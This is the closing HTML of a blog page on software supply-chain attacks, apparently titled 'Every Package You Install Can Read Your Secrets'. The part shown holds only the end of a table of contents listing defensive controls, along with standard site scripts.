toc-level-2"><a class="toc-link" href="#Controls-That-Change-The-Exposure"><span class="toc-number">5.</span> <span class="toc-text">Controls That Change The Exposure</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Make-installs-repeatable"><span class="toc-number">5.1.</span> <span class="toc-text">Make installs repeatable</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Pin-CI-actions-and-release-tooling"><span class="toc-number">5.2.</span> <span class="toc-text">Pin CI actions and release tooling</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Separate-build-time-and-runtime-secrets"><span class="toc-number">5.3.</span> <span class="toc-text">Separate build-time and runtime secrets</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Be-slower-around-direct-Git-installs-and-tiny-convenience-packages"><span class="toc-number">5.4.</span> <span class="toc-text">Be slower around direct Git installs and tiny convenience packages</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Watch-outbound-traffic-from-sensitive-environments"><span class="toc-number">5.5.</span> <span class="toc-text">Watch outbound traffic from sensitive environments</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#A-Short-Review"><span class="toc-number">6.</span> <span class="toc-text">A Short Review</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://www.eliranturgeman.com/2026/03/28/supply-chain-attacks/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://www.eliranturgeman.com/2026/03/28/supply-chain-attacks/&text=Every Package You Install Can Read Your Secrets"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://www.eliranturgeman.com/2026/03/28/supply-chain-attacks/&title=Every Package You Install Can Read Your Secrets"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://www.eliranturgeman.com/2026/03/28/supply-chain-attacks/&is_video=false&description=Every Package You Install Can Read Your Secrets"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Every Package You Install Can Read Your Secrets&body=Check out this article: https://www.eliranturgeman.com/2026/03/28/supply-chain-attacks/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://www.eliranturgeman.com/2026/03/28/supply-chain-attacks/&title=Every Package You Install Can Read Your Secrets"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://www.eliranturgeman.com/2026/03/28/supply-chain-attacks/&title=Every Package You Install Can Read Your Secrets"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://www.eliranturgeman.com/2026/03/28/supply-chain-attacks/&title=Every Package You Install Can Read Your Secrets"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://www.eliranturgeman.com/2026/03/28/supply-chain-attacks/&title=Every Package You Install Can Read Your Secrets"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://www.eliranturgeman.com/2026/03/28/supply-chain-attacks/&name=Every Package You Install Can Read Your Secrets&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://www.eliranturgeman.com/2026/03/28/supply-chain-attacks/&t=Every Package You Install Can Read Your Secrets"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2022-2026
    Eliran Turgeman
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li>
            <a href="/">Home</a>
          </li><!--
     --><!--
       --><li>
            <a href="/about/">About</a>
          </li><!--
     --><!--
       --><li>
            <a href="/security-for-builders/">Security for Builders</a>
          </li><!--
     --><!--
       --><li>
            <a href="/archives/">Archives</a>
          </li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- theme switcher -->

<script src="/js/theme-switcher.js"></script>

<!-- search -->

<!-- Google Analytics -->

    <script async src="https://www.googletagmanager.com/gtag/js?id=G-6CNCM8BXLV"></script>
    <script>
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());
        gtag('config', 'G-6CNCM8BXLV');
    </script>
  
<script src="/js/analytics-events.js"></script>


<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->


<script>
  document.addEventListener("DOMContentLoaded", function() {
    const banner = document.getElementById("banner");
    const closeBanner = document.getElementById("closeBanner");

    // Some pages don't include the banner markup.
    if (!banner) return;

    // TTL in milliseconds (e.g., 1 day = 86400000 ms)
    const ttl = 86400000; // 1 day in milliseconds

    // Get the stored timestamp of when the banner was closed
    const bannerClosedAt = localStorage.getItem('bannerClosedAt');
    const bannerClosedAtMs = bannerClosedAt ? parseInt(bannerClosedAt, 10) : null;
    const now = Date.now();

    // Check if the TTL has expired or if the bannerClosedAt key does not exist
    if (!bannerClosedAtMs || (now - bannerClosedAtMs) > ttl) {
      // If the banner was never closed or TTL has passed, show the banner
      banner.classList.add('show'); // Add the 'show' class to make the banner visible
    }

    // Close the banner and store the current timestamp in localStorage
    if (closeBanner) {
      closeBanner.onclick = function() {
        banner.classList.remove('show'); // Hide the banner
        localStorage.setItem('bannerClosedAt', String(Date.now())); // Store the timestamp when closed
      };
    }
  });
</script>


</body>
</html>
